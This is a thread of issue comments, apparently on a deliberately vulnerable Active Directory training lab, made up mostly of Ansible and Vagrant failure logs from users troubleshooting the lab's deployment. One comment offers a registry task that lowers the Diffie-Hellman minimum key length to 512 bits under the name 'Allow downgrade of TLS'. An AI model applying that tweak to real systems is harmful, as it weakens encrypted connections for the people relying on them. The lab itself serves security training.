fatal: [192.168.56.11]: FAILED! => {"changed": true, "debug": [], "error": [{"category_info": {"activity": "Set-ADDefaultDomainPasswordPolicy", "category": "ResourceUnavailable", "category_id": 21, "reason": "ADServerDownException", "target_name": "WORKGROUP", "target_type": "ADDefaultDomainPasswordPolicy"}, "error_details": null, "exception": {"help_link": null, "hresult": -2146233088, "inner_exception": {"help_link": null, "hresult": -2146233088, "inner_exception": null, "message": "Unable to find a default server with flags: 'Writable | ADWS | ReturnDnsName'.", "source": null, "type": "Microsoft.ActiveDirectory.Management.ADException"}, "message": "Unable to find a default server with Active Directory Web Services running.", "source": "Microsoft.ActiveDirectory.Management", "type": "Microsoft.ActiveDirectory.Management.ADServerDownException"}, "fully_qualified_error_id": "ActiveDirectoryServer:1355,Microsoft.ActiveDirectory.Management.Commands.SetADDefaultDomainPasswordPolicy", "output": "Set-ADDefaultDomainPasswordPolicy : Unable to find a default server with Active Directory Web Services running.\r\nAt line:19 char:1\r\n+ Set-ADDefaultDomainPasswordPolicy -Identity $Domain -AuthType Negotia ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : ResourceUnavailable: (WORKGROUP:ADDefaultDomainPasswordPolicy) \r\n[Set-ADDefaultDomainPasswordPolicy], ADServerDownException\r\n + FullyQualifiedErrorId : \r\nActiveDirectoryServer:1355,Microsoft.ActiveDirectory.Management.Commands.SetADDefaultDomainPasswordPolicy\r\n \r\n", "pipeline_iteration_info": [0, 1], "script_stack_trace": "at , : line 19", "target_object": {"AddedProperties": [], "ComplexityEnabled": null, "LockoutDuration": null, "LockoutObservationWindow": null, "LockoutThreshold": null, "MaxPasswordAge": null, "MinPasswordAge": null, "MinPasswordLength": null, "ModifiedProperties": [], "PasswordHistoryCount": null, "PropertyCount": 0, "PropertyNames": [], "RemovedProperties": [], "ReversibleEncryptionEnabled": null}}], "host_err": "", "host_out": "", "information": [], "output": [], "result": {}, "verbose": [], "warning": []}
PLAY RECAP ***************************************************************************************************************
192.168.56.11 : ok=27 changed=6 unreachable=0 failed=1 skipped=3 rescued=0 ignored=0
Hi Mayfly277, thank you for the great lab. I got this issue when running task "Add trusts between domain"
I had rerun mail.yml and ad-trusts.yml many times but the issues still exist.
Hi, what is the license to this project ? can i fork-it to modify it and add a terraform deployment ?
Having issues with this specific Ansible Task-
'''An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.11] (item={'key': 'AcrossTheSea', 'value': ['essos.local\daenerys.targaryen']}) => {"ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "AcrossTheSea", "value": ["essos.local\daenerys.targaryen"]}, "msg": "Unhandled exception while executing module: The server has rejected the client credentials."}
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.12] (item={'key': 'DragonsFriends', 'value': ['north.sevenkingdoms.local\jon.snow', 'sevenkingdoms.local\tyron.lannister', 'essos.local\daenerys.targaryen']}) => {"ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "DragonsFriends", "value": ["north.sevenkingdoms.local\jon.snow", "sevenkingdoms.local\tyron.lannister", "essos.local\daenerys.targaryen"]}, "msg": "Unhandled exception while executing module: The server has rejected the client credentials."}'
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.12] (item={'key': 'Spys', 'value': ['sevenkingdoms.local\Small Council']}) => {"ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "Spys", "value": ["sevenkingdoms.local\Small Council"]}, "msg": "Unhandled exception while executing module: Either the target name is incorrect or the server has rejected the client credentials."}
''
Some troubleshooting :
Domain Trust Verification And ADUC error showing issue Adding "Small [email protected]" to "[email protected]" Similar issue with the other Security groups tagged with "multi domain"
nslookup to sevenkingdoms.local from essos.local (dc03 192.168.56.12)
nslookup to essos.local from sevenkingdoms.local (dc01 192.168.56.10)
I was consistently getting this error:
TASK [groups_domains : Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}}] **************************************************************************************************
changed: [192.168.56.11] => (item={'key': 'AcrossTheSea', 'value': ['essos.local\\daenerys.targaryen']})
FAILED - RETRYING: [192.168.56.10]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (3 retries left).
changed: [192.168.56.12] => (item={'key': 'DragonsFriends', 'value': ['sevenkingdoms.local\\tyron.lannister', 'essos.local\\daenerys.targaryen']})
ok: [192.168.56.12] => (item={'key': 'Spys', 'value': ['sevenkingdoms.local\\Small Council']})
FAILED - RETRYING: [192.168.56.10]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (2 retries left).
FAILED - RETRYING: [192.168.56.10]: Add a domain user/group from another Domain in the multi-domain forest to a domain group : {{domain_server}} (1 retries left).
An exception occurred during task execution. To see the full traceback, use -vvv. The error was: at Microsoft.ActiveDirectory.Management.Commands.ADCmdletBase`1.BeginProcessing()
failed: [192.168.56.10] (item={'key': 'AcrossTheNarrowSea', 'value': ['essos.local\\daenerys.targaryen']}) => {"ansible_loop_var": "item", "attempts": 3, "changed": false, "item": {"key": "AcrossTheNarrowSea", "value": ["essos.local\\daenerys.targaryen"]}, "msg": "Unhandled exception while executing module: A call to SSPI failed, see inner exception."}
An advanced google search led me to this URL:
stackoverflow link
I opted for the reg key mod and added the following between the "synchroizes all domains" and the "Add a domain user/group from another Domain...." tasks in the file "ansible/roles/groups_domains/tasks/main.yml":
- name: "Allow downgrade of TLS"
ansible.windows.win_regedit:
path: HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\KeyExchangeAlgorithms\Diffie-Hellman
name: ClientMinKeyBitLength
data: 00000200
type: dword
And now it's working. I can drop this in a pull request if desired...
Is this meant to be started from a certain user on a certain box? Or do you domain join your own box to start? Or just start on the same subnet and attack from the outside of AD?
sudo docker run -ti --rm --network host -h goadansible -v $(pwd):/goad -w /goad/ansible goadansible ansible-playbook main.yml
PLAY [build all] **************************************************************************************************************************************
TASK [Gathering Facts] ********************************************************************************************************************************
ok: [192.168.56.23]
ok: [192.168.56.12]
ok: [192.168.56.10]
ok: [192.168.56.11]
ok: [192.168.56.22]
TASK [common : Upgrade module PowerShellGet to fix accept license issue on last windows ansible version] **********************************************
fatal: [192.168.56.12]: FAILED! => {"changed": true, "cmd": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInstall-PackageProvider -Name NuGet -Force\nInstall-Module PowerShellGet -Force", "delta": "0:00:02.529639", "end": "2022-11-04 16:39:26.660434", "msg": "non-zero return code", "rc": 1, "start": "2022-11-04 16:39:24.130795", "stderr": "Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package \r\nprovider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.\r\nAt line:2 char:1\r\n+ Install-PackageProvider -Name NuGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac \r\n kageProvider], Exception\r\n + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro \r\n vider\r\n \r\nException calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and \r\nPrompt functionality is not available."\r\nAt C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7392 char:8\r\n+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : NotSpecified: (:) [], MethodInvocationException\r\n + FullyQualifiedErrorId : PSInvalidOperationException\r\n \r\nInstall-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' \r\nor newer version of NuGet provider is installed.\r\nAt line:3 char:1\r\n+ Install-Module PowerShellGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException\r\n + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module", "stderr_lines": ["Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package ", "provider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.", "At line:2 char:1", "+ Install-PackageProvider -Name NuGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac ", " kageProvider], Exception", " + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro ", " vider", " ", "Exception calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and ", "Prompt functionality is not available."", "At C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7392 char:8", "+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : NotSpecified: (:) [], MethodInvocationException", " + FullyQualifiedErrorId : PSInvalidOperationException", " ", "Install-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' ", "or newer version of NuGet provider is installed.", "At line:3 char:1", "+ Install-Module PowerShellGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException", " + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module"], "stdout": "", "stdout_lines": []}
fatal: [192.168.56.23]: FAILED! => {"changed": true, "cmd": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInstall-PackageProvider -Name NuGet -Force\nInstall-Module PowerShellGet -Force", "delta": "0:00:02.577486", "end": "2022-11-04 16:39:26.711897", "msg": "non-zero return code", "rc": 1, "start": "2022-11-04 16:39:24.134410", "stderr": "Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package \r\nprovider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.\r\nAt line:2 char:1\r\n+ Install-PackageProvider -Name NuGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac \r\n kageProvider], Exception\r\n + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro \r\n vider\r\n \r\nException calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and \r\nPrompt functionality is not available."\r\nAt C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7392 char:8\r\n+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : NotSpecified: (:) [], MethodInvocationException\r\n + FullyQualifiedErrorId : PSInvalidOperationException\r\n \r\nInstall-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' \r\nor newer version of NuGet provider is installed.\r\nAt line:3 char:1\r\n+ Install-Module PowerShellGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException\r\n + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module", "stderr_lines": ["Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package ", "provider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.", "At line:2 char:1", "+ Install-PackageProvider -Name NuGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac ", " kageProvider], Exception", " + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro ", " vider", " ", "Exception calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and ", "Prompt functionality is not available."", "At C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7392 char:8", "+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : NotSpecified: (:) [], MethodInvocationException", " + FullyQualifiedErrorId : PSInvalidOperationException", " ", "Install-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' ", "or newer version of NuGet provider is installed.", "At line:3 char:1", "+ Install-Module PowerShellGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException", " + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module"], "stdout": "", "stdout_lines": []}
fatal: [192.168.56.10]: FAILED! => {"changed": true, "cmd": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInstall-PackageProvider -Name NuGet -Force\nInstall-Module PowerShellGet -Force", "delta": "0:00:13.594279", "end": "2022-11-04 16:39:37.952821", "msg": "non-zero return code", "rc": 1, "start": "2022-11-04 16:39:24.358541", "stderr": "Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package \r\nprovider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.\r\nAt line:2 char:1\r\n+ Install-PackageProvider -Name NuGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac \r\n kageProvider], Exception\r\n + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro \r\n vider\r\n \r\nException calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and \r\nPrompt functionality is not available."\r\nAt C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7455 char:8\r\n+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : NotSpecified: (:) [], MethodInvocationException\r\n + FullyQualifiedErrorId : PSInvalidOperationException\r\n \r\nInstall-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' \r\nor newer version of NuGet provider is installed.\r\nAt line:3 char:1\r\n+ Install-Module PowerShellGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException\r\n + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module", "stderr_lines": ["Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package ", "provider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.", "At line:2 char:1", "+ Install-PackageProvider -Name NuGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac ", " kageProvider], Exception", " + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro ", " vider", " ", "Exception calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and ", "Prompt functionality is not available."", "At C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7455 char:8", "+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : NotSpecified: (:) [], MethodInvocationException", " + FullyQualifiedErrorId : PSInvalidOperationException", " ", "Install-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' ", "or newer version of NuGet provider is installed.", "At line:3 char:1", "+ Install-Module PowerShellGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException", " + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module"], "stdout": "", "stdout_lines": []}
fatal: [192.168.56.11]: FAILED! => {"changed": true, "cmd": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInstall-PackageProvider -Name NuGet -Force\nInstall-Module PowerShellGet -Force", "delta": "0:00:13.530956", "end": "2022-11-04 16:39:37.955485", "msg": "non-zero return code", "rc": 1, "start": "2022-11-04 16:39:24.424529", "stderr": "Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package \r\nprovider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.\r\nAt line:2 char:1\r\n+ Install-PackageProvider -Name NuGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac \r\n kageProvider], Exception\r\n + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro \r\n vider\r\n \r\nException calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and \r\nPrompt functionality is not available."\r\nAt C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7455 char:8\r\n+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : NotSpecified: (:) [], MethodInvocationException\r\n + FullyQualifiedErrorId : PSInvalidOperationException\r\n \r\nInstall-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' \r\nor newer version of NuGet provider is installed.\r\nAt line:3 char:1\r\n+ Install-Module PowerShellGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException\r\n + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module", "stderr_lines": ["Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package ", "provider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.", "At line:2 char:1", "+ Install-PackageProvider -Name NuGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac ", " kageProvider], Exception", " + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro ", " vider", " ", "Exception calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and ", "Prompt functionality is not available."", "At C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7455 char:8", "+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : NotSpecified: (:) [], MethodInvocationException", " + FullyQualifiedErrorId : PSInvalidOperationException", " ", "Install-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' ", "or newer version of NuGet provider is installed.", "At line:3 char:1", "+ Install-Module PowerShellGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException", " + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module"], "stdout": "", "stdout_lines": []}
fatal: [192.168.56.22]: FAILED! => {"changed": true, "cmd": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nInstall-PackageProvider -Name NuGet -Force\nInstall-Module PowerShellGet -Force", "delta": "0:00:13.531467", "end": "2022-11-04 16:39:37.993241", "msg": "non-zero return code", "rc": 1, "start": "2022-11-04 16:39:24.461774", "stderr": "Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package \r\nprovider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.\r\nAt line:2 char:1\r\n+ Install-PackageProvider -Name NuGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac \r\n kageProvider], Exception\r\n + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro \r\n vider\r\n \r\nException calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and \r\nPrompt functionality is not available."\r\nAt C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7455 char:8\r\n+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : NotSpecified: (:) [], MethodInvocationException\r\n + FullyQualifiedErrorId : PSInvalidOperationException\r\n \r\nInstall-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' \r\nor newer version of NuGet provider is installed.\r\nAt line:3 char:1\r\n+ Install-Module PowerShellGet -Force\r\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException\r\n + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module", "stderr_lines": ["Install-PackageProvider : No match was found for the specified search criteria for the provider 'NuGet'. The package ", "provider requires 'PackageManagement' and 'Provider' tags. Please check if the specified package has the tags.", "At line:2 char:1", "+ Install-PackageProvider -Name NuGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidArgument: (Microsoft.Power...PackageProvider:InstallPackageProvider) [Install-Pac ", " kageProvider], Exception", " + FullyQualifiedErrorId : NoMatchFoundForProvider,Microsoft.PowerShell.PackageManagement.Cmdlets.InstallPackagePro ", " vider", " ", "Exception calling "ShouldContinue" with "2" argument(s): "Windows PowerShell is in NonInteractive mode. Read and ", "Prompt functionality is not available."", "At C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1:7455 char:8", "+ if($Force -or $psCmdlet.ShouldContinue($shouldContinueQueryMessag ...", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : NotSpecified: (:) [], MethodInvocationException", " + FullyQualifiedErrorId : PSInvalidOperationException", " ", "Install-Module : NuGet provider is required to interact with NuGet-based repositories. Please ensure that '2.8.5.201' ", "or newer version of NuGet provider is installed.", "At line:3 char:1", "+ Install-Module PowerShellGet -Force", "+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~", " + CategoryInfo : InvalidOperation: (:) [Install-Module], InvalidOperationException", " + FullyQualifiedErrorId : CouldNotInstallNuGetProvider,Install-Module"], "stdout": "", "stdout_lines": []}
PLAY RECAP ********************************************************************************************************************************************
192.168.56.10 : ok=1 changed=0 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.11 : ok=1 changed=0 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.12 : ok=1 changed=0 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.22 : ok=1 changed=0 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
192.168.56.23 : ok=1 changed=0 unreachable=0 failed=1 skipped=2 rescued=0 ignored=0
when running 'vagrant halt' after a successful launch, I get the following:
==> SRV03: Attempting graceful shutdown of VM...
==> SRV02: Attempting graceful shutdown of VM...
==> DC03: Attempting graceful shutdown of VM...
Traceback (most recent call last):
79: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/bin/vagrant:248:in <main>' 78: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/environment.rb:301:in
cli'
77: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/cli.rb:67:in execute' 76: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/commands/halt/command.rb:30:in
execute'
75: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/plugin/v2/command.rb:232:in with_target_vms' 74: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/plugin/v2/command.rb:232:in
each'
73: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/plugin/v2/command.rb:243:in block in with_target_vms' 72: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/commands/halt/command.rb:31:in
block in execute'
71: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/machine.rb:203:in action' 70: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/machine.rb:203:in
call'
69: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/environment.rb:631:in lock' 68: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/machine.rb:217:in
block in action'
67: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/machine.rb:248:in action_raw' 66: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in
run'
65: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/util/busy.rb:19:in busy' 64: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in
block in run'
63: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builder.rb:180:in call' 62: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in
call'
61: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/providers/virtualbox/action/check_virtualbox.rb:26:in call' 60: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in
call'
59: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builtin/call.rb:53:in call' 58: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in
run'
57: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/util/busy.rb:19:in busy' 56: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in
block in run'
55: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builder.rb:180:in call' 54: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in
call'
53: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:127:in block in finalize_action' 52: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in
call'
51: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/providers/virtualbox/action/check_accessible.rb:18:in call' 50: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in
call'
49: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/plugins/providers/virtualbox/action/discard_state.rb:15:in call' 48: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/warden.rb:48:in
call'
47: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/builtin/call.rb:53:in call' 46: from /opt/vagrant/embedded/gems/2.3.2/gems/vagrant-2.3.2/lib/vagrant/action/runner.rb:101:in
run'
